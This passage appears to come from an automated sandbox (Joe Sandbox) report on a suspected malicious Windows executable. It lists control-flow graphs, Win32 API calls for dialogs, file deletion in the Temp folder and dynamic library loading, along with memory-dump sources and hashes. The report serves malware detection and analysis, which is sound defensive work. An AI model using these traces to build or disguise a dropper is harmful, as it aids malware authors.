221->222 222->210 224->200 224->205 240 405219-40522d InvalidateRect 225->240 241 40517d 225->241 249 40513d-40514c SendMessageW 226->249 250 40512f-405135 226->250 230->207 231->207 240->181 245 40522f-40523e call 404bbf call 404ba7 240->245 243 405180-40518b 241->243 246 405201-405213 243->246 247 40518d-40519c 243->247 245->181 246->240 246->243 252 40519e-4051ab 247->252 253 4051af-4051b2 247->253 249->225 254 405137 250->254 255 405138-40513b 250->255 252->253 256 4051b4-4051b7 253->256 257 4051b9-4051c2 253->257 254->255 255->249 255->250 259 4051c7-4051ff SendMessageW * 2 256->259 257->259 260 4051c4 257->260 259->246 260->259
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                                                                                                    • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                                                    • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F261B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F26121B: GlobalAlloc.KERNELBASE(00000040,?,6F26123B,?,6F2612DF,00000019,6F2611BE,-000000A0), ref: 6F261225
                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F261C6B
                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 6F261CB3
                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 6F261CBD
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F261CD0
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F261DB2
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F261DB7
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F261DBC
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F261FA6
                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 6F262140
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 6F2621B5
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 6F2621C6
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 6F262220
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000808), ref: 6F26223A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 245916457-0
                                                                                                                                                                                                                    • Opcode ID: 666352d20a03c4e58c2524f0afa3a1083bfde525a97f98aeb0e586ddb4916d68
                                                                                                                                                                                                                    • Instruction ID: 7c74d7e200c1f53c3f4573048f0d07d2bb2ee65af1089f1303a63d6a097f9606
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 666352d20a03c4e58c2524f0afa3a1083bfde525a97f98aeb0e586ddb4916d68
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A2279B1D1464EDBDB148FB88584AEEB7B0FF05B1AF10862AD1A5E6180D774BAC1CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004059CC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 783 4059cc-4059f2 call 405c97 786 4059f4-405a06 DeleteFileW 783->786 787 405a0b-405a12 783->787 788 405b88-405b8c 786->788 789 405a14-405a16 787->789 790 405a25-405a35 call 4062ba 787->790 791 405b36-405b3b 789->791 792 405a1c-405a1f 789->792 796 405a44-405a45 call 405bdb 790->796 797 405a37-405a42 lstrcatW 790->797 791->788 794 405b3d-405b40 791->794 792->790 792->791 798 405b42-405b48 794->798 799 405b4a-405b52 call 4065fd 794->799 800 405a4a-405a4e 796->800 797->800 798->788 799->788 807 405b54-405b68 call 405b8f call 405984 799->807 803 405a50-405a58 800->803 804 405a5a-405a60 lstrcatW 800->804 803->804 806 405a65-405a81 lstrlenW FindFirstFileW 803->806 804->806 808 405a87-405a8f 806->808 809 405b2b-405b2f 806->809 823 405b80-405b83 call 405322 807->823 824 405b6a-405b6d 807->824 812 405a91-405a99 808->812 813 405aaf-405ac3 call 4062ba 808->813 809->791 811 405b31 809->811 811->791 815 405a9b-405aa3 812->815 816 405b0e-405b1e FindNextFileW 812->816 825 405ac5-405acd 813->825 826 405ada-405ae5 call 405984 813->826 815->813 819 405aa5-405aad 815->819 816->808 822 405b24-405b25 FindClose 816->822 819->813 819->816 822->809 823->788 824->798 829 405b6f-405b7e call 405322 call 406080 824->829 825->816 830 405acf-405ad8 call 4059cc 825->830 836 405b06-405b09 call 405322 826->836 837 405ae7-405aea 826->837 829->788 830->816 836->816 839 405aec-405afc call 405322 call 406080 837->839 840 405afe-405b04 837->840 839->816 840->816
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77573420,00000000), ref: 004059F5
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0042F250,\*.*), ref: 00405A3D
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405A60
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,77573420,00000000), ref: 00405A66
                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,77573420,00000000), ref: 00405A76
                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe", xrefs: 004059CC
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                                                                                                                                                                                                    • \*.*, xrefs: 00405A37
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                    • API String ID: 2035342205-3730370250
                                                                                                                                                                                                                    • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                                                                                    • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004065FD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,77573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,77573420), ref: 00406608
                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                    • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                                                                                    • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 261 403d58-403d6a 262 403d70-403d76 261->262 263 403eab-403eba 261->263 262->263 264 403d7c-403d85 262->264 265 403f09-403f1e 263->265 266 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 263->266 269 403d87-403d94 SetWindowPos 264->269 270 403d9a-403d9d 264->270 267 403f20-403f23 265->267 268 403f5e-403f63 call 40427d 265->268 266->265 272 403f25-403f30 call 401389 267->272 273 403f56-403f58 267->273 280 403f68-403f83 268->280 269->270 275 403db7-403dbd 270->275 276 403d9f-403db1 ShowWindow 270->276 272->273 294 403f32-403f51 SendMessageW 272->294 273->268 279 4041fe 273->279 281 403dd9-403ddc 275->281 282 403dbf-403dd4 DestroyWindow 275->282 276->275 284 404200-404207 279->284 290 403f85-403f87 call 40140b 280->290 291 403f8c-403f92 280->291 287 403dde-403dea SetWindowLongW 281->287 288 403def-403df5 281->288 285 4041db-4041e1 282->285 285->279 296 4041e3-4041e9 285->296 287->284 292 403e98-403ea6 call 404298 288->292 293 403dfb-403e0c GetDlgItem 288->293 290->291 297 403f98-403fa3 291->297 298 4041bc-4041d5 DestroyWindow EndDialog 291->298 292->284 299 403e2b-403e2e 293->299 300 403e0e-403e25 SendMessageW IsWindowEnabled 293->300 294->284 296->279 302 4041eb-4041f4 ShowWindow 296->302 297->298 303 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 297->303 298->285 305 403e30-403e31 299->305 306 403e33-403e36 299->306 300->279 300->299 302->279 331 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 303->331 332 403ff8-403ffd 303->332 309 403e61-403e66 call 40420a 305->309 310 403e44-403e49 306->310 311 403e38-403e3e 306->311 309->292 315 403e7f-403e92 SendMessageW 310->315 316 403e4b-403e51 310->316 314 403e40-403e42 311->314 311->315 314->309 315->292 319 403e53-403e59 call 40140b 316->319 320 403e68-403e71 call 40140b 316->320 329 403e5f 319->329 320->292 328 403e73-403e7d 320->328 328->329 329->309 335 404041 331->335 336 40403e-40403f 331->336 332->331 337 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404073-404084 SendMessageW 337->338 339 404086 337->339 340 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 338->340 339->340 340->280 351 4040d1-4040d3 340->351 351->280 352 4040d9-4040dd 351->352 353 4040fc-404110 DestroyWindow 352->353 354 4040df-4040e5 352->354 353->285 355 404116-404143 CreateDialogParamW 353->355 354->279 356 4040eb-4040f1 354->356 355->285 358 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 355->358 356->280 357 4040f7 356->357 357->279 358->279 363 4041a2-4041ba ShowWindow call 40427d 358->363 363->285
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                                                                                    • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                                                                                    • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004039AA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 366 4039aa-4039c2 call 406694 369 4039c4-4039d4 call 406201 366->369 370 4039d6-403a0d call 406188 366->370 378 403a30-403a59 call 403c80 call 405c97 369->378 375 403a25-403a2b lstrcatW 370->375 376 403a0f-403a20 call 406188 370->376 375->378 376->375 384 403aeb-403af3 call 405c97 378->384 385 403a5f-403a64 378->385 391 403b01-403b26 LoadImageW 384->391 392 403af5-403afc call 4062dc 384->392 385->384 386 403a6a-403a92 call 406188 385->386 386->384 393 403a94-403a98 386->393 395 403ba7-403baf call 40140b 391->395 396 403b28-403b58 RegisterClassW 391->396 392->391 400 403aaa-403ab6 lstrlenW 393->400 401 403a9a-403aa7 call 405bbc 393->401 408 403bb1-403bb4 395->408 409 403bb9-403bc4 call 403c80 395->409 397 403c76 396->397 398 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 396->398 406 403c78-403c7f 397->406 398->395 402 403ab8-403ac6 lstrcmpiW 400->402 403 403ade-403ae6 call 405b8f call 4062ba 400->403 401->400 402->403 407 403ac8-403ad2 GetFileAttributesW 402->407 403->384 412 403ad4-403ad6 407->412 413 403ad8-403ad9 call 405bdb 407->413 408->406 419 403bca-403be4 ShowWindow call 406624 409->419 420 403c4d-403c55 call 4053f5 409->420 412->403 412->413 413->403 427 403bf0-403c02 GetClassInfoW 419->427 428 403be6-403beb call 406624 419->428 425 403c57-403c5d 420->425 426 403c6f-403c71 call 40140b 420->426 425->408 429 403c63-403c6a call 40140b 425->429 426->397 432 403c04-403c14 GetClassInfoW RegisterClassW 427->432 433 403c1a-403c3d DialogBoxParamW call 40140b 427->433 428->427 429->408 432->433 436 403c42-403c4b call 4038fa 433->436 436->406
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                      • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A2B
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
